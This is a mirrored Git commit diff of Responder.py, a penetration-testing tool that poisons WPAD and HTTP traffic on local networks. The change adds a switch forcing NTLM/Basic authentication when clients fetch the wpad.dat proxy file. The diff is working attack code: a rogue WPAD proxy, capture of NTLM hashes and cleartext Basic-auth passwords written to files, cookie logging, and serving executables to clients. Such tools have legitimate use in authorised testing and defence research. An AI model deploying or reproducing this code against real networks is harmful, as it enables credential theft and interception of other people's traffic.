mirror of
https://github.com/lgandx/Responder.git
synced 2025-08-20 13:23:38 -07:00
Added: -F command line switch to force authentication on PAC file retrieval. Default is Off
This commit is contained in:
lgandx
parent
111a14cb0a
commit
3f48c114d5
1 changed files with 50 additions and 17 deletions
67
Responder.py
67
Responder.py
|
|
@ -38,6 +38,8 @@ parser.add_option('-f','--fingerprint', action="store", dest="Finger", help = "T
|
||||||
|
|
||||||
parser.add_option('-w','--wpad', action="store", dest="WPAD_On_Off", help = "Set this to On or Off to start/stop the WPAD rogue proxy server. Default value is On", metavar="Off", choices=['On','on','off','Off'], default="On")
|
parser.add_option('-w','--wpad', action="store", dest="WPAD_On_Off", help = "Set this to On or Off to start/stop the WPAD rogue proxy server. Default value is On", metavar="Off", choices=['On','on','off','Off'], default="On")
|
||||||
|
|
||||||
|
parser.add_option('-F','--ForceWpadAuth', action="store", dest="Force_WPAD_Auth", help = "Set this to On or Off to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Default value is Off", metavar="Off", choices=['On','on','off','Off'], default="Off")
|
||||||
|
|
||||||
parser.add_option('--lm',action="store", help="Set this to On if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is Off", metavar="Off",dest="LM_On_Off", choices=['On','on','off','Off'], default="Off")
|
parser.add_option('--lm',action="store", help="Set this to On if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is Off", metavar="Off",dest="LM_On_Off", choices=['On','on','off','Off'], default="Off")
|
||||||
|
|
||||||
parser.add_option('-v',action="store_true", help="More verbose",dest="Verbose")
|
parser.add_option('-v',action="store_true", help="More verbose",dest="Verbose")
|
||||||
|
|
@ -83,6 +85,7 @@ Basic = options.Basic.upper()
|
||||||
Finger_On_Off = options.Finger.upper()
|
Finger_On_Off = options.Finger.upper()
|
||||||
INTERFACE = options.INTERFACE
|
INTERFACE = options.INTERFACE
|
||||||
Verbose = options.Verbose
|
Verbose = options.Verbose
|
||||||
|
Force_WPAD_Auth = options.Force_WPAD_Auth.upper()
|
||||||
|
|
||||||
if INTERFACE != "Not set":
|
if INTERFACE != "Not set":
|
||||||
BIND_TO_Interface = INTERFACE
|
BIND_TO_Interface = INTERFACE
|
||||||
|
|
@ -1045,16 +1048,18 @@ def GrabCookie(data,host):
|
||||||
def WpadCustom(data,client):
|
def WpadCustom(data,client):
|
||||||
Wpad = re.search('(/wpad.dat|/*\.pac)', data)
|
Wpad = re.search('(/wpad.dat|/*\.pac)', data)
|
||||||
if Wpad:
|
if Wpad:
|
||||||
Message = "[+]WPAD file sent to: %s"%(client)
|
|
||||||
if Verbose:
|
|
||||||
print Message
|
|
||||||
logging.warning(Message)
|
|
||||||
buffer1 = WPADScript(Payload=WPAD_Script)
|
buffer1 = WPADScript(Payload=WPAD_Script)
|
||||||
buffer1.calculate()
|
buffer1.calculate()
|
||||||
return str(buffer1)
|
return str(buffer1)
|
||||||
else:
|
else:
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
def WpadForcedAuth(Force_WPAD_Auth):
|
||||||
|
if Force_WPAD_Auth == "ON":
|
||||||
|
return True
|
||||||
|
else:
|
||||||
|
return False
|
||||||
|
|
||||||
# Function used to check if we answer with a Basic or NTLM auth.
|
# Function used to check if we answer with a Basic or NTLM auth.
|
||||||
def Basic_Ntlm(Basic):
|
def Basic_Ntlm(Basic):
|
||||||
if Basic == "ON":
|
if Basic == "ON":
|
||||||
|
|
@ -1112,11 +1117,13 @@ def GrabURL(data, host):
|
||||||
def PacketSequence(data,client):
|
def PacketSequence(data,client):
|
||||||
Ntlm = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
|
Ntlm = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
|
||||||
BasicAuth = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
|
BasicAuth = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
|
||||||
|
|
||||||
if ServeEXEOrNot(Exe_On_Off) and re.findall('.exe', data):
|
if ServeEXEOrNot(Exe_On_Off) and re.findall('.exe', data):
|
||||||
File = config.get('HTTP Server', 'ExecFilename')
|
File = config.get('HTTP Server', 'ExecFilename')
|
||||||
buffer1 = ServerExeFile(Payload = ServeEXE(data,client,File),filename=File)
|
buffer1 = ServerExeFile(Payload = ServeEXE(data,client,File),filename=File)
|
||||||
buffer1.calculate()
|
buffer1.calculate()
|
||||||
return str(buffer1)
|
return str(buffer1)
|
||||||
|
|
||||||
if ServeEXECAlwaysOrNot(Exec_Mode_On_Off):
|
if ServeEXECAlwaysOrNot(Exec_Mode_On_Off):
|
||||||
if IsExecutable(FILENAME):
|
if IsExecutable(FILENAME):
|
||||||
buffer1 = ServeAlwaysExeFile(Payload = ServeEXE(data,client,FILENAME),ContentDiFile=FILENAME)
|
buffer1 = ServeAlwaysExeFile(Payload = ServeEXE(data,client,FILENAME),ContentDiFile=FILENAME)
|
||||||
|
|
@ -1126,6 +1133,7 @@ def PacketSequence(data,client):
|
||||||
buffer1 = ServeAlwaysNormalFile(Payload = ServeEXE(data,client,FILENAME))
|
buffer1 = ServeAlwaysNormalFile(Payload = ServeEXE(data,client,FILENAME))
|
||||||
buffer1.calculate()
|
buffer1.calculate()
|
||||||
return str(buffer1)
|
return str(buffer1)
|
||||||
|
|
||||||
if Ntlm:
|
if Ntlm:
|
||||||
packetNtlm = b64decode(''.join(Ntlm))[8:9]
|
packetNtlm = b64decode(''.join(Ntlm))[8:9]
|
||||||
if packetNtlm == "\x01":
|
if packetNtlm == "\x01":
|
||||||
|
|
@ -1135,14 +1143,23 @@ def PacketSequence(data,client):
|
||||||
r.calculate()
|
r.calculate()
|
||||||
t = IIS_NTLM_Challenge_Ans()
|
t = IIS_NTLM_Challenge_Ans()
|
||||||
t.calculate(str(r))
|
t.calculate(str(r))
|
||||||
buffer1 = str(t)
|
buffer1 = str(t)
|
||||||
return buffer1
|
return buffer1
|
||||||
if packetNtlm == "\x03":
|
if packetNtlm == "\x03":
|
||||||
NTLM_Auth= b64decode(''.join(Ntlm))
|
NTLM_Auth= b64decode(''.join(Ntlm))
|
||||||
ParseHTTPHash(NTLM_Auth,client)
|
ParseHTTPHash(NTLM_Auth,client)
|
||||||
buffer1 = IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe'))
|
if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client):
|
||||||
buffer1.calculate()
|
Message = "[+]WPAD (auth) file sent to: %s"%(client)
|
||||||
return str(buffer1)
|
if Verbose:
|
||||||
|
print Message
|
||||||
|
logging.warning(Message)
|
||||||
|
buffer1 = WpadCustom(data,client)
|
||||||
|
return buffer1
|
||||||
|
else:
|
||||||
|
buffer1 = IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe'))
|
||||||
|
buffer1.calculate()
|
||||||
|
return str(buffer1)
|
||||||
|
|
||||||
if BasicAuth:
|
if BasicAuth:
|
||||||
GrabCookie(data,client)
|
GrabCookie(data,client)
|
||||||
GrabURL(data,client)
|
GrabURL(data,client)
|
||||||
|
|
@ -1151,9 +1168,17 @@ def PacketSequence(data,client):
|
||||||
print "[+]HTTP-User & Password:", b64decode(''.join(BasicAuth))
|
print "[+]HTTP-User & Password:", b64decode(''.join(BasicAuth))
|
||||||
WriteData(outfile,b64decode(''.join(BasicAuth)), b64decode(''.join(BasicAuth)))
|
WriteData(outfile,b64decode(''.join(BasicAuth)), b64decode(''.join(BasicAuth)))
|
||||||
logging.warning('[+]HTTP-User & Password: %s'%(b64decode(''.join(BasicAuth))))
|
logging.warning('[+]HTTP-User & Password: %s'%(b64decode(''.join(BasicAuth))))
|
||||||
buffer1 = IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe'))
|
if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client):
|
||||||
buffer1.calculate()
|
Message = "[+]WPAD (auth) file sent to: %s"%(client)
|
||||||
return str(buffer1)
|
if Verbose:
|
||||||
|
print Message
|
||||||
|
logging.warning(Message)
|
||||||
|
buffer1 = WpadCustom(data,client)
|
||||||
|
return buffer1
|
||||||
|
else:
|
||||||
|
buffer1 = IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe'))
|
||||||
|
buffer1.calculate()
|
||||||
|
return str(buffer1)
|
||||||
|
|
||||||
else:
|
else:
|
||||||
return str(Basic_Ntlm(Basic))
|
return str(Basic_Ntlm(Basic))
|
||||||
|
|
@ -1162,20 +1187,25 @@ def PacketSequence(data,client):
|
||||||
class HTTP(BaseRequestHandler):
|
class HTTP(BaseRequestHandler):
|
||||||
|
|
||||||
def handle(self):
|
def handle(self):
|
||||||
try:
|
try:
|
||||||
while True:
|
while True:
|
||||||
self.request.settimeout(0.1)
|
self.request.settimeout(1)
|
||||||
data = self.request.recv(8092)
|
data = self.request.recv(8092)
|
||||||
buff = WpadCustom(data,self.client_address[0])
|
buff = WpadCustom(data,self.client_address[0])
|
||||||
if buff:
|
if buff and Force_WPAD_Auth == "OFF":
|
||||||
|
Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0])
|
||||||
|
if Verbose:
|
||||||
|
print Message
|
||||||
|
logging.warning(Message)
|
||||||
self.request.send(buff)
|
self.request.send(buff)
|
||||||
else:
|
else:
|
||||||
buffer0 = PacketSequence(data,self.client_address[0])
|
buffer0 = PacketSequence(data,self.client_address[0])
|
||||||
self.request.sendall(buffer0)
|
self.request.send(buffer0)
|
||||||
except Exception:
|
except Exception:
|
||||||
pass#No need to be verbose..
|
pass#No need to be verbose..
|
||||||
self.request.close()
|
self.request.close()
|
||||||
|
|
||||||
|
|
||||||
##################################################################################
|
##################################################################################
|
||||||
#HTTP Proxy Stuff
|
#HTTP Proxy Stuff
|
||||||
##################################################################################
|
##################################################################################
|
||||||
|
|
@ -1345,8 +1375,11 @@ class ProxyHandler (BaseHTTPServer.BaseHTTPRequestHandler):
|
||||||
OutFile = os.path.join(ResponderPATH,"HTTPCookies/HTTP-Cookie-request-"+netloc+"-from-"+self.client_address[0]+".txt")
|
OutFile = os.path.join(ResponderPATH,"HTTPCookies/HTTP-Cookie-request-"+netloc+"-from-"+self.client_address[0]+".txt")
|
||||||
WriteData(OutFile,Message, Message)
|
WriteData(OutFile,Message, Message)
|
||||||
if data:
|
if data:
|
||||||
out.send(data)
|
try:
|
||||||
count = 0
|
out.send(data)
|
||||||
|
count = 0
|
||||||
|
except:
|
||||||
|
pass
|
||||||
if count == max_idling:
|
if count == max_idling:
|
||||||
break
|
break
|
||||||
return None
|
return None
|
||||||
|
|
|
||||||
Loading…
Add table
Add a link
Reference in a new issue